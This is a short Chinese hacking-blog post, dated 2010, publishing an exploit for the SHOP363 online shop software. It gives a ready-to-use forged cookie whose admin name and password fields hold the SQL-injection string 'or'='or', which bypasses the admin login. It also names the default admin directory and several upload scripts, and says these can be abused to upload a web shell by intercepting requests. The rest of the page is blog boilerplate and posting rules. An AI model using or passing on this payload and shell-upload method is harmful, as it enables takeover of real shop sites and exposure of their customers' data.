凌风[0x0F]'s BloG

Enjoy In Hacking

黑客在线工具 联系方式 移到底部 登录

SHOP363网店系统通杀漏洞

COOKIES欺骗,下面的是COOKIES利用代码:


Sy%5FShops=TFlags=1%2C2%2C3%2C4%2C5%2C11%2C12%_2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C21%2C22%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C41%2C42%2C43%_2C44%2C51%2C52%2C53%2C54%2C55%2C56%2C61%2C62%2C63%2C64&AdminoldFlags=1&Truename=%CE%_DE&AdminFlags=1&AdminPassword='or'='or'&AdminName='or'='or';


这样可以进后台了

网站默认后台目录:Admin_Shop363

管理目录下有两个上传文件admin_upload.asp和admin_nupload.asp可以传递目录值.

csv目录里有上传文件upfile1.asp,可抓包上传shell。

0x0F 于2010年7月26日 发自 漏洞发布

[微博礼仪规范]

微博礼仪规范

我们真诚地欢迎光临本微博的每一位网友,但是这里需要一个文明、健康的互动环境。为此,我们希望:

  • 1、遵守国家法律,请不要发布违反国家法律的内容;
  • 2、遵守社会公德,请不要使用不文明字词作为个人昵称,发布消息攻击、谩骂他人;
  • 3、避免信息垃圾,请不要在短时间内反复发布同一条消息; 请不要发布、传播谣言;

在微博里,收听的权力在听众手里,如果您的行为让他人不适,最终将会让你失去所有听众。

来,说说你在做什么,想什么



验证码

 
 

博主:0x0F

专注于WEB安全,寻志同道合的朋友一起交流技术。QQ:unMD5(50a9780c2be657b465f74e56f1d6e429)

我的话题

最新广播

我的收藏

腾讯微博

返回顶部↑